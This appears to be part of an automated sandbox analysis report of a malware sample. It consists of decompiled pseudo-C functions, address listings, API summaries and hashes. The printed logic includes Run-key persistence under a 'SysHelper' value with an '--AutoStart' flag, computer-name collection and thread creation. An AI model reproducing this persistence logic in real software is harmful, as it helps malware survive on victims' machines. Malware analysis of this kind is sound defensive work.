                                                                                                    • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                    • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                    • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                    • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 78%
                                                                                                    			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				intOrPtr _t12;
                                                                                                    				intOrPtr _t13;
                                                                                                    				intOrPtr _t15;
                                                                                                    				intOrPtr _t22;
                                                                                                    				intOrPtr* _t42;
                                                                                                    
                                                                                                    				if(_a4 > 5 || _a8 == 0) {
                                                                                                    					L4:
                                                                                                    					return 0;
                                                                                                    				} else {
                                                                                                    					_t42 = E00428C96(8, 1);
                                                                                                    					_t48 = _t42;
                                                                                                    					if(_t42 != 0) {
                                                                                                    						_t12 = E00428C96(0xb8, 1);
                                                                                                    						 *_t42 = _t12;
                                                                                                    						__eflags = _t12;
                                                                                                    						if(_t12 != 0) {
                                                                                                    							_t13 = E00428C96(0x220, 1);
                                                                                                    							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                                                                    							__eflags = _t13;
                                                                                                    							if(_t13 != 0) {
                                                                                                    								E004255AC( *_t42, 0x50aae8);
                                                                                                    								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                                                                                    								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                    								__eflags = _t15;
                                                                                                    								if(__eflags == 0) {
                                                                                                    									L14:
                                                                                                    									E00420BED();
                                                                                                    									E0042453C( *_t42);
                                                                                                    									E004243E2( *_t42);
                                                                                                    									E00420BED(_t42);
                                                                                                    									_t42 = 0;
                                                                                                    									L16:
                                                                                                    									return _t42;
                                                                                                    								}
                                                                                                    								_push( *((intOrPtr*)( *_t42 + 4)));
                                                                                                    								_t22 = E00424BDD(__edx, 1, __eflags);
                                                                                                    								__eflags = _t22;
                                                                                                    								if(_t22 == 0) {
                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                                                                    									goto L16;
                                                                                                    								}
                                                                                                    								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                    								goto L14;
                                                                                                    							}
                                                                                                    							E00420BED( *_t42);
                                                                                                    							E00420BED(_t42);
                                                                                                    							L8:
                                                                                                    							goto L3;
                                                                                                    						}
                                                                                                    						E00420BED(_t42);
                                                                                                    						goto L8;
                                                                                                    					}
                                                                                                    					L3:
                                                                                                    					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
                                                                                                    					goto L4;
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x00425aa0
                                                                                                    0x00425ac6
                                                                                                    0x00000000
                                                                                                    0x00425aa8
                                                                                                    0x00425ab3
                                                                                                    0x00425ab7
                                                                                                    0x00425ab9
                                                                                                    0x00425ad2
                                                                                                    0x00425ad7
                                                                                                    0x00425adb
                                                                                                    0x00425add
                                                                                                    0x00425aee
                                                                                                    0x00425af3
                                                                                                    0x00425af8
                                                                                                    0x00425afa
                                                                                                    0x00425b13
                                                                                                    0x00425b20
                                                                                                    0x00425b28
                                                                                                    0x00425b2b
                                                                                                    0x00425b2d
                                                                                                    0x00425b42
                                                                                                    0x00425b42
                                                                                                    0x00425b49
                                                                                                    0x00425b50
                                                                                                    0x00425b56
                                                                                                    0x00425b5e
                                                                                                    0x00425b67
                                                                                                    0x00000000
                                                                                                    0x00425b67
                                                                                                    0x00425b31
                                                                                                    0x00425b34
                                                                                                    0x00425b3b
                                                                                                    0x00425b3d
                                                                                                    0x00425b65
                                                                                                    0x00000000
                                                                                                    0x00425b65
                                                                                                    0x00425b3f
                                                                                                    0x00000000
                                                                                                    0x00425b3f
                                                                                                    0x00425afe
                                                                                                    0x00425b04
                                                                                                    0x00425ae5
                                                                                                    0x00000000
                                                                                                    0x00425ae5
                                                                                                    0x00425ae0
                                                                                                    0x00000000
                                                                                                    0x00425ae0
                                                                                                    0x00425abb
                                                                                                    0x00425ac0
                                                                                                    0x00000000
                                                                                                    0x00425ac0

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1503006713-0
                                                                                                    • Opcode ID: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
                                                                                                    • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                    • Opcode Fuzzy Hash: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
                                                                                                    • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 81%
                                                                                                    			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                    				char _v8;
                                                                                                    				char _v12;
                                                                                                    				signed int _v16;
                                                                                                    				char _v20;
                                                                                                    				char _v24;
                                                                                                    				char _v32;
                                                                                                    				char _v40;
                                                                                                    				char _v2308;
                                                                                                    				char _v2312;
                                                                                                    				intOrPtr _v2316;
                                                                                                    				int _v2320;
                                                                                                    				intOrPtr _v2328;
                                                                                                    				int _v2332;
                                                                                                    				short _v2336;
                                                                                                    				intOrPtr _v2340;
                                                                                                    				short _v2348;
                                                                                                    				intOrPtr _v2352;
                                                                                                    				int _v2356;
                                                                                                    				short _v2372;
                                                                                                    				char _v2376;
                                                                                                    				int _v2384;
                                                                                                    				int _v2388;
                                                                                                    				intOrPtr _v2396;
                                                                                                    				int _v2400;
                                                                                                    				intOrPtr _v2404;
                                                                                                    				long _v2408;
                                                                                                    				intOrPtr _v2412;
                                                                                                    				int _v2416;
                                                                                                    				char _v2424;
                                                                                                    				char _v2432;
                                                                                                    				char _v2436;
                                                                                                    				signed int _v2440;
                                                                                                    				void* _v2448;
                                                                                                    				intOrPtr _v2452;
                                                                                                    				signed int _v2456;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				long _t100;
                                                                                                    				intOrPtr* _t101;
                                                                                                    				long _t102;
                                                                                                    				void* _t111;
                                                                                                    				long _t117;
                                                                                                    				void* _t125;
                                                                                                    				void* _t128;
                                                                                                    				void* _t136;
                                                                                                    				intOrPtr _t140;
                                                                                                    				long _t141;
                                                                                                    				long _t150;
                                                                                                    				intOrPtr* _t151;
                                                                                                    				long _t152;
                                                                                                    				void* _t154;
                                                                                                    				void* _t155;
                                                                                                    				void* _t156;
                                                                                                    				void* _t158;
                                                                                                    				void* _t161;
                                                                                                    				int _t164;
                                                                                                    				intOrPtr* _t165;
                                                                                                    				signed int _t170;
                                                                                                    				short* _t171;
                                                                                                    				short* _t172;
                                                                                                    				intOrPtr* _t176;
                                                                                                    				intOrPtr* _t185;
                                                                                                    				void* _t187;
                                                                                                    				void* _t191;
                                                                                                    				DWORD* _t194;
                                                                                                    				struct HWND__* _t195;
                                                                                                    				struct HWND__* _t203;
                                                                                                    				intOrPtr _t206;
                                                                                                    				intOrPtr _t208;
                                                                                                    				signed int _t211;
                                                                                                    				signed int _t212;
                                                                                                    				void* _t213;
                                                                                                    				void* _t215;
                                                                                                    				void* _t216;
                                                                                                    				short* _t218;
                                                                                                    				short* _t219;
                                                                                                    				void* _t221;
                                                                                                    
                                                                                                    				_t212 = _t211 & 0xfffffff8;
                                                                                                    				_t164 = _a8;
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cb187);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t212;
                                                                                                    				_t213 = _t212 - 0x978;
                                                                                                    				_push(_t158);
                                                                                                    				_push(_t191);
                                                                                                    				_t221 = _t164 - 0x8001;
                                                                                                    				if(_t221 > 0) {
                                                                                                    					_t100 = _t164 - 0x8003;
                                                                                                    					__eflags = _t100;
                                                                                                    					if(_t100 == 0) {
                                                                                                    						_t165 =  *0x513268;
                                                                                                    						_t101 =  *_t165;
                                                                                                    						__eflags = _t101 - _t165;
                                                                                                    						if(_t101 == _t165) {
                                                                                                    							L46:
                                                                                                    							__eflags =  *0x52923c;
                                                                                                    							if( *0x52923c != 0) {
                                                                                                    								goto L50;
                                                                                                    							} else {
                                                                                                    								goto L47;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							while(1) {
                                                                                                    								__eflags =  *((char*)(_t101 + 0xd));
                                                                                                    								if( *((char*)(_t101 + 0xd)) != 0) {
                                                                                                    									break;
                                                                                                    								}
                                                                                                    								_t101 =  *_t101;
                                                                                                    								__eflags = _t101 - _t165;
                                                                                                    								if(_t101 != _t165) {
                                                                                                    									continue;
                                                                                                    								} else {
                                                                                                    									goto L46;
                                                                                                    								}
                                                                                                    								goto L51;
                                                                                                    							}
                                                                                                    							L50:
                                                                                                    							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
                                                                                                    							 *[fs:0x0] = _v16;
                                                                                                    							return _t102;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						__eflags = _t100 == 1;
                                                                                                    						if(_t100 == 1) {
                                                                                                    							_v2408 = 0x400;
                                                                                                    							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
                                                                                                    							GetComputerNameW(_t107,  &_v2408);
                                                                                                    							_v2412 = 7;
                                                                                                    							_v2416 = 0;
                                                                                                    							_v2432 = 0;
                                                                                                    							_v8 = 0;
                                                                                                    							_t111 = E00413100( &_v2348, _t191, L"\\\\");
                                                                                                    							_v12 = 1;
                                                                                                    							_t194 = E0041CE80( &_v2376, _t111, _t205);
                                                                                                    							_t215 = _t213 + 8;
                                                                                                    							__eflags =  &_v2436 - _t194;
                                                                                                    							if( &_v2436 != _t194) {
                                                                                                    								__eflags = 0;
                                                                                                    								_v2412 = 7;
                                                                                                    								_v2416 = 0;
                                                                                                    								_v2432 = 0;
                                                                                                    								E004145A0( &_v2432, _t194);
                                                                                                    							}
                                                                                                    							__eflags = _v2352 - 8;
                                                                                                    							if(_v2352 >= 8) {
                                                                                                    								L00422587(_v2372);
                                                                                                    								_t215 = _t215 + 4;
                                                                                                    							}
                                                                                                    							_v2352 = 7;
                                                                                                    							_v8 = 0;
                                                                                                    							__eflags = _v2328 - 8;
                                                                                                    							_v2356 = 0;
                                                                                                    							_v2372 = 0;
                                                                                                    							if(_v2328 >= 8) {
                                                                                                    								L00422587(_v2348);
                                                                                                    								_t215 = _t215 + 4;
                                                                                                    							}
                                                                                                    							_v2328 = 7;
                                                                                                    							_v2332 = 0;
                                                                                                    							_v2348 = 0;
                                                                                                    							E00420BED(_t205);
                                                                                                    							_t206 =  *0x529240; // 0x0
                                                                                                    							_t170 = 0;
                                                                                                    							_t216 = _t215 + 4;
                                                                                                    							_v2440 = 0;
                                                                                                    							__eflags = _t206 -  *0x529244; // 0x0
                                                                                                    							if(__eflags == 0) {
                                                                                                    								L37:
                                                                                                    								_t195 = _a4;
                                                                                                    								_t208 =  *((intOrPtr*)( *0x513268));
                                                                                                    								_t117 = IsWindow(_t195);
                                                                                                    								__eflags = _t117;
                                                                                                    								if(_t117 != 0) {
                                                                                                    									__eflags =  *(_t208 + 0x8c8);
                                                                                                    									if( *(_t208 + 0x8c8) <= 0) {
                                                                                                    										 *0x529224 = 1;
                                                                                                    										DestroyWindow(_t195);
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								_t40 = _t206 + 0x28; // 0x28
                                                                                                    								_t161 = _t40;
                                                                                                    								do {
                                                                                                    									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
                                                                                                    									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
                                                                                                    										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
                                                                                                    										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
                                                                                                    											_t218 = _t216 - 0x18;
                                                                                                    											_t171 = _t218;
                                                                                                    											_v2436 = _t218;
                                                                                                    											_push(0xffffffff);
                                                                                                    											 *((intOrPtr*)(_t171 + 0x14)) = 7;
                                                                                                    											 *(_t171 + 0x10) = 0;
                                                                                                    											 *_t171 = 0;
                                                                                                    											E00414690(_t161, _t171,  &_v2432, 0);
                                                                                                    											_t219 = _t218 - 0x18;
                                                                                                    											_v20 = 2;
                                                                                                    											_t172 = _t219;
                                                                                                    											_push(0xffffffff);
                                                                                                    											 *((intOrPtr*)(_t172 + 0x14)) = 7;
                                                                                                    											 *(_t172 + 0x10) = 0;
                                                                                                    											 *_t172 = 0;
                                                                                                    											E00414690(_t161, _t172, _t161, 0);
                                                                                                    											_v32 = 0;
                                                                                                    											_t125 = E0040EFF0(0);
                                                                                                    											_t216 = _t219 + 0x30;
                                                                                                    											__eflags = _t125 - 0xffffffff;
                                                                                                    											if(_t125 != 0xffffffff) {
                                                                                                    												_t170 = _v2448;
                                                                                                    											} else {
                                                                                                    												_v2388 = 0;
                                                                                                    												_v2384 = 0;
                                                                                                    												E0041C330(_t194, _t206,  &_v2388);
                                                                                                    												_t128 = E00419D10( &_v2308);
                                                                                                    												_v20 = 3;
                                                                                                    												E0041C240(_t194, _t206, _t128);
                                                                                                    												_v24 = 0;
                                                                                                    												E0041B680( &_v2312);
                                                                                                    												_t176 =  *0x513268;
                                                                                                    												_t131 =  *_t176;
                                                                                                    												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
                                                                                                    												_v2452 =  *((intOrPtr*)(_t176 + 4)) + 8;
                                                                                                    												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
                                                                                                    												E0041B8B0(_t161, _t197, _t131 + 8);
                                                                                                    												_v2404 = 7;
                                                                                                    												_push(0xffffffff);
                                                                                                    												_v2408 = 0;
                                                                                                    												_v2424 = 0;
                                                                                                    												E00414690(_t161,  &_v2424, _t161, 0);
                                                                                                    												_v40 = 4;
                                                                                                    												_t136 = E0041CE80( &_v2356,  &_v2436, "\\");
                                                                                                    												_t216 = _t216 + 4;
                                                                                                    												E004131D0(_t197 + 0x8a4, _t136);
                                                                                                    												__eflags = _v2340 - 8;
                                                                                                    												if(_v2340 >= 8) {
                                                                                                    													L00422587(_v2336);
                                                                                                    													_t216 = _t216 + 4;
                                                                                                    												}
                                                                                                    												_v2316 = 7;
                                                                                                    												_v20 = 0;
                                                                                                    												__eflags = _v2396 - 8;
                                                                                                    												_v2320 = 0;
                                                                                                    												_v2336 = 0;
                                                                                                    												if(_v2396 >= 8) {
                                                                                                    													L00422587(_v2416);
                                                                                                    													_t216 = _t216 + 4;
                                                                                                    												}
                                                                                                    												_v2396 = 7;
                                                                                                    												_v2416 = 0;
                                                                                                    												_t140 =  *0x529228; // 0x54d9b0
                                                                                                    												_v2400 = 0;
                                                                                                    												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
                                                                                                    												_t141 = CreateThread(0, 0, E0041F130, _v2448, 0, _t194);
                                                                                                    												__eflags = _t141;
                                                                                                    												_t194[1] = _t141;
                                                                                                    												_t170 =  !=  ? 1 : _v2456 & 0x000000ff;
                                                                                                    												_v2456 = _t170;
                                                                                                    											}
                                                                                                    										}
                                                                                                    									}
                                                                                                    									_t206 = _t206 + 0x70;
                                                                                                    									_t161 = _t161 + 0x70;
                                                                                                    									__eflags = _t206 -  *0x529244; // 0x0
                                                                                                    								} while (__eflags != 0);
                                                                                                    								__eflags = _t170;
                                                                                                    								if(_t170 == 0) {
                                                                                                    									goto L37;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							__eflags = _v2412 - 8;
                                                                                                    							if(_v2412 >= 8) {
                                                                                                    								L00422587(_v2432);
                                                                                                    							}
                                                                                                    							goto L49;
                                                                                                    						} else {
                                                                                                    							goto L15;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					if(_t221 == 0) {
                                                                                                    						_t185 =  *0x513268;
                                                                                                    						_t151 =  *_t185;
                                                                                                    						__eflags = _t151 - _t185;
                                                                                                    						if(_t151 == _t185) {
                                                                                                    							goto L49;
                                                                                                    						} else {
                                                                                                    							while(1) {
                                                                                                    								__eflags =  *((char*)(_t151 + 0xd));
                                                                                                    								if( *((char*)(_t151 + 0xd)) != 0) {
                                                                                                    									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
                                                                                                    									 *[fs:0x0] = _v16;
                                                                                                    									return _t152;
                                                                                                    								}
                                                                                                    								_t151 =  *_t151;
                                                                                                    								__eflags = _t151 - _t185;
                                                                                                    								if(_t151 != _t185) {
                                                                                                    									continue;
                                                                                                    								} else {
                                                                                                    									goto L49;
                                                                                                    								}
                                                                                                    								goto L51;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_t154 = _t164 - 2;
                                                                                                    						if(_t154 == 0) {
                                                                                                    							PostQuitMessage(0);
                                                                                                    							L49:
                                                                                                    							 *[fs:0x0] = _v16;
                                                                                                    							return 0;
                                                                                                    						} else {
                                                                                                    							_t155 = _t154 - 0xf;
                                                                                                    							if(_t155 == 0) {
                                                                                                    								goto L49;
                                                                                                    							} else {
                                                                                                    								_t156 = _t155 - 5;
                                                                                                    								if(_t156 != 0) {
                                                                                                    									L15:
                                                                                                    									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16);
                                                                                                    									 *[fs:0x0] = _v16;
                                                                                                    									return _t150;
                                                                                                    								} else {
                                                                                                    									if(_a12 != _t156) {
                                                                                                    										E00411CD0(_t158, 0, _t156);
                                                                                                    										L47:
                                                                                                    										_t203 = _a4;
                                                                                                    										if(IsWindow(_t203) != 0) {
                                                                                                    											 *0x529224 = 1;
                                                                                                    											DestroyWindow(_t203);
                                                                                                    										}
                                                                                                    									}
                                                                                                    									goto L49;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    				L51:
                                                                                                    			}


















































































                                                                                                    0x0041bae3
                                                                                                    0x0041baec
                                                                                                    0x0041baef
                                                                                                    0x0041baf1
                                                                                                    0x0041baf6
                                                                                                    0x0041baf7
                                                                                                    0x0041bafe
                                                                                                    0x0041bb04
                                                                                                    0x0041bb06
                                                                                                    0x0041bb07
                                                                                                    0x0041bb0d
                                                                                                    0x0041bba2
                                                                                                    0x0041bba2
                                                                                                    0x0041bba7
                                                                                                    0x0041bf3d
                                                                                                    0x0041bf43
                                                                                                    0x0041bf45
                                                                                                    0x0041bf47
                                                                                                    0x0041bf5c
                                                                                                    0x0041bf5c
                                                                                                    0x0041bf63
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bf50
                                                                                                    0x0041bf50
                                                                                                    0x0041bf50
                                                                                                    0x0041bf54
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bf56
                                                                                                    0x0041bf58
                                                                                                    0x0041bf5a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bf5a
                                                                                                    0x0041bf9a
                                                                                                    0x0041bfa8
                                                                                                    0x0041bfb7
                                                                                                    0x0041bfc2
                                                                                                    0x0041bfc2
                                                                                                    0x0041bbad
                                                                                                    0x0041bbad
                                                                                                    0x0041bbae
                                                                                                    0x0041bbdc
                                                                                                    0x0041bbec
                                                                                                    0x0041bbf4
                                                                                                    0x0041bbfc
                                                                                                    0x0041bc04
                                                                                                    0x0041bc0c
                                                                                                    0x0041bc1a
                                                                                                    0x0041bc21
                                                                                                    0x0041bc29
                                                                                                    0x0041bc3a
                                                                                                    0x0041bc3c
                                                                                                    0x0041bc43
                                                                                                    0x0041bc45
                                                                                                    0x0041bc5a
                                                                                                    0x0041bc5c
                                                                                                    0x0041bc69
                                                                                                    0x0041bc71
                                                                                                    0x0041bc76
                                                                                                    0x0041bc76
                                                                                                    0x0041bc7b
                                                                                                    0x0041bc80
                                                                                                    0x0041bc86
                                                                                                    0x0041bc8b
                                                                                                    0x0041bc8b
                                                                                                    0x0041bc90
                                                                                                    0x0041bc98
                                                                                                    0x0041bc9f
                                                                                                    0x0041bca4
                                                                                                    0x0041bcac
                                                                                                    0x0041bcb1
                                                                                                    0x0041bcb7
                                                                                                    0x0041bcbc
                                                                                                    0x0041bcbc
                                                                                                    0x0041bcc1
                                                                                                    0x0041bcca
                                                                                                    0x0041bcd2
                                                                                                    0x0041bcd7
                                                                                                    0x0041bcdc
                                                                                                    0x0041bce2
                                                                                                    0x0041bce4
                                                                                                    0x0041bce7
                                                                                                    0x0041bceb
                                                                                                    0x0041bcf1
                                                                                                    0x0041befb
                                                                                                    0x0041bf01
                                                                                                    0x0041bf05
                                                                                                    0x0041bf07
                                                                                                    0x0041bf0d
                                                                                                    0x0041bf0f
                                                                                                    0x0041bf11
                                                                                                    0x0041bf18
                                                                                                    0x0041bf1b
                                                                                                    0x0041bf22
                                                                                                    0x0041bf22
                                                                                                    0x0041bf18
                                                                                                    0x0041bcf7
                                                                                                    0x0041bcf7
                                                                                                    0x0041bcf7
                                                                                                    0x0041bd00
                                                                                                    0x0041bd00
                                                                                                    0x0041bd04
                                                                                                    0x0041bd0a
                                                                                                    0x0041bd0e
                                                                                                    0x0041bd14
                                                                                                    0x0041bd19
                                                                                                    0x0041bd1b
                                                                                                    0x0041bd1f
                                                                                                    0x0041bd21
                                                                                                    0x0041bd28
                                                                                                    0x0041bd30
                                                                                                    0x0041bd38
                                                                                                    0x0041bd3d
                                                                                                    0x0041bd40
                                                                                                    0x0041bd48
                                                                                                    0x0041bd4c
                                                                                                    0x0041bd4f
                                                                                                    0x0041bd56
                                                                                                    0x0041bd5e
                                                                                                    0x0041bd61
                                                                                                    0x0041bd68
                                                                                                    0x0041bd70
                                                                                                    0x0041bd75
                                                                                                    0x0041bd78
                                                                                                    0x0041bd7b
                                                                                                    0x0041bee1
                                                                                                    0x0041bd81
                                                                                                    0x0041bd85
                                                                                                    0x0041bd8e
                                                                                                    0x0041bd96
                                                                                                    0x0041bda2
                                                                                                    0x0041bda8
                                                                                                    0x0041bdb0
                                                                                                    0x0041bdbc
                                                                                                    0x0041bdc4
                                                                                                    0x0041bdc9
                                                                                                    0x0041bdcf
                                                                                                    0x0041bdd4
                                                                                                    0x0041bdd9
                                                                                                    0x0041bddd
                                                                                                    0x0041bde7
                                                                                                    0x0041bdee
                                                                                                    0x0041bdf6
                                                                                                    0x0041bdfe
                                                                                                    0x0041be06
                                                                                                    0x0041be0b
                                                                                                    0x0041be19
                                                                                                    0x0041be28
                                                                                                    0x0041be2d
                                                                                                    0x0041be37
                                                                                                    0x0041be3c
                                                                                                    0x0041be44
                                                                                                    0x0041be4d
                                                                                                    0x0041be52
                                                                                                    0x0041be52
                                                                                                    0x0041be57
                                                                                                    0x0041be62
                                                                                                    0x0041be69
                                                                                                    0x0041be6e
                                                                                                    0x0041be79
                                                                                                    0x0041be81
                                                                                                    0x0041be87
                                                                                                    0x0041be8c
                                                                                                    0x0041be8c
                                                                                                    0x0041be91
                                                                                                    0x0041be99
                                                                                                    0x0041be9e
                                                                                                    0x0041bea3
                                                                                                    0x0041beae
                                                                                                    0x0041bec1
                                                                                                    0x0041becb
                                                                                                    0x0041becd
                                                                                                    0x0041bed8
                                                                                                    0x0041bedb
                                                                                                    0x0041bedb
                                                                                                    0x0041bd7b
                                                                                                    0x0041bd0e
                                                                                                    0x0041bee5
                                                                                                    0x0041bee8
                                                                                                    0x0041beeb
                                                                                                    0x0041beeb
                                                                                                    0x0041bef7
                                                                                                    0x0041bef9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bef9
                                                                                                    0x0041bf28
                                                                                                    0x0041bf2d
                                                                                                    0x0041bf33
                                                                                                    0x0041bf38
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bbae
                                                                                                    0x0041bb13
                                                                                                    0x0041bb13
                                                                                                    0x0041bb54
                                                                                                    0x0041bb5a
                                                                                                    0x0041bb5c
                                                                                                    0x0041bb5e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041bb64
                                                                                                    0x0041bb64
                                                                                                    0x0041bb68
                                                                                                    0x0041bb83
                                                                                                    0x0041bb90
                                                                                                    0x0041bb9d
                                                                                                    0x0041bb9d
                                                                                                    0x0041bb6a
                                                                                                    0x0041bb6c
                                                                                                    0x0041bb6e
                                                                                                    0x00000000
                                                                                                    0x0041bb70
                                                                                                    0x00000000
                                                                                                    0x0041bb70
                                                                                                    0x00000000
                                                                                                    0x0041bb6e
                                                                                                    0x0041bb64
                                                                                                    0x0041bb15
                                                                                                    0x0041bb17
                                                                                                    0x0041bb1a
                                                                                                    0x0041bb49
                                                                                                    0x0041bf81
                                                                                                    0x0041bf8a
                                                                                                    0x0041bf97
                                                                                                    0x0041bb1c
                                                                                                    0x0041bb1c
                                                                                                    0x0041bb1f
                                                                                                    0x00000000
                                                                                                    0x0041bb25
                                                                                                    0x0041bb25
                                                                                                    0x0041bb28
                                                                                                    0x0041bbb0
                                                                                                    0x0041bbba
                                                                                                    0x0041bbc7
                                                                                                    0x0041bbd4
                                                                                                    0x0041bb2e
                                                                                                    0x0041bb31
                                                                                                    0x0041bb3a
                                                                                                    0x0041bf65
                                                                                                    0x0041bf65
                                                                                                    0x0041bf71
                                                                                                    0x0041bf74
                                                                                                    0x0041bf7b
                                                                                                    0x0041bf7b
                                                                                                    0x0041bf71
                                                                                                    0x00000000
                                                                                                    0x0041bb31
                                                                                                    0x0041bb28
                                                                                                    0x0041bb1f
                                                                                                    0x0041bb1a
                                                                                                    0x0041bb13
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                    • _malloc.LIBCMT ref: 0041BBE4
                                                                                                    • GetComputerNameW.KERNEL32 ref: 0041BBF4
                                                                                                    • _free.LIBCMT ref: 0041BCD7
                                                                                                      • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                      • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                      • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                      • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                      • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                      • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                    • IsWindow.USER32(?), ref: 0041BF69
                                                                                                    • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                    • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3873257347-0
                                                                                                    • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                    • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                    • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                    • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 84%
